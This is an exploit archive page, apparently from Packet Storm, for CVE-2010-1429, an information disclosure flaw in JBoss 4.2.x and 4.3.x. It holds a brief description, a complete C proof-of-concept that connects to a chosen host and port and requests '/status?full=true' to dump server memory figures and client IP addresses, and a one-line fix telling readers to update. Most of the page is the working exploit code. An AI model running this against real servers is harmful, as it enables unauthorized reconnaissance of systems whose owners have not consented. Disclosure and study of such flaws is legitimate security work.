what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

JBoss 4.2.x / 4.3.x Information Disclosure

JBoss 4.2.x / 4.3.x Information Disclosure
Posted Feb 9, 2018
Authored by Jameel Nabbo

JBoss versions 4.2.x and 4.3.x suffer from an information disclosure vulnerability.

tags | exploit, info disclosure
advisories | CVE-2010-1429
SHA-256 | 0e2fd33b9f9bd5f397c52b4c3a3eccf448b390c0e0b66ee20c5f079cb3803bd6
Download | Favorite | View

JBoss 4.2.x / 4.3.x Information Disclosure

Change Mirror Download
# Exploit Title: JBoss sensitive information disclosure 4.2X & 4.3.X
# Date: 02/08/2018
# Exploit Author: JameelNabbo
# Vendor Homepage: http://www.jboss.org <http://www.jboss.org/>
# Software Link: http://jbossas.jboss.org/downloads <http://jbossas.jboss.org/downloads>
# Version: 4.2X. & 4.3.X
# Tested on: Linux Ubuntu
# CVE : CVE-2010-1429
 
 
 
 
1. Description
    
By requesting the Status param and sitting its value to true, Jobss will print a sensitive information such as Memory used/Total Memory / Client IP address.
Example:   http://127.0.01/status?full=true
  
    
2. Proof of Concept
 
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>
#include <fcntl.h>
#include <netinet/tcp.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <netdb.h>
 
 
int socket_connect(char *host, in_port_t port){
    struct hostent *hp;
    struct sockaddr_in addr;
    int on = 1, sock;
     
    if((hp = gethostbyname(host)) == NULL){
        herror("gethostbyname");
        exit(1);
    }
    bcopy(hp->h_addr, &addr.sin_addr, hp->h_length);
    addr.sin_port = htons(port);
    addr.sin_family = AF_INET;
    sock = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP);
    setsockopt(sock, IPPROTO_TCP, TCP_NODELAY, (const char *)&on, sizeof(int));
     
    if(sock == -1){
        perror("setsockopt");
        exit(1);
    }
     
    if(connect(sock, (struct sockaddr *)&addr, sizeof(struct sockaddr_in)) == -1){
        perror("connect");
        exit(1);
         
    }
    return sock;
}
 
#define BUFFER_SIZE 1024
 
int main(int argc, char *argv[]){
    int fd;
    char buffer[BUFFER_SIZE];
     
    if(argc < 3){
        fprintf(stderr, "Usage: %s <hostname> <port>\n", argv[0]);
        exit(1);
    }
     
    fd = socket_connect(argv[1], atoi(argv[2]));
    write(fd, "GET /status?full=true\r\n", strlen("GET /status?full=true\r\n")); // write(fd, char[]*, len);
    while(read(fd, buffer, BUFFER_SIZE - 1) != 0){
         fprintf(stderr, "%s", buffer);
    }
 
    shutdown(fd, SHUT_RDWR);
    close(fd);
    return 0;
}
 
 
3. Solution :
Update to version 4.2.3 or later

Login or Register to add favorites

File Archive:

September 2023

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    2 Files
  • 2
    Sep 2nd
    21 Files
  • 3
    Sep 3rd
    0 Files
  • 4
    Sep 4th
    17 Files
  • 5
    Sep 5th
    34 Files
  • 6
    Sep 6th
    29 Files
  • 7
    Sep 7th
    11 Files
  • 8
    Sep 8th
    25 Files
  • 9
    Sep 9th
    0 Files
  • 10
    Sep 10th
    0 Files
  • 11
    Sep 11th
    26 Files
  • 12
    Sep 12th
    23 Files
  • 13
    Sep 13th
    17 Files
  • 14
    Sep 14th
    22 Files
  • 15
    Sep 15th
    16 Files
  • 16
    Sep 16th
    0 Files
  • 17
    Sep 17th
    0 Files
  • 18
    Sep 18th
    19 Files
  • 19
    Sep 19th
    60 Files
  • 20
    Sep 20th
    23 Files
  • 21
    Sep 21st
    15 Files
  • 22
    Sep 22nd
    8 Files
  • 23
    Sep 23rd
    0 Files
  • 24
    Sep 24th
    0 Files
  • 25
    Sep 25th
    17 Files
  • 26
    Sep 26th
    3 Files
  • 27
    Sep 27th
    0 Files
  • 28
    Sep 28th
    0 Files
  • 29
    Sep 29th
    0 Files
  • 30
    Sep 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Site Links
News by Month
News Tags
Files by Month
File Tags
File Directory
About Us
History & Purpose
Contact Information
Terms of Service
Privacy Statement
Copyright Information
Services
Security Services
Hosting By
Rokasec
close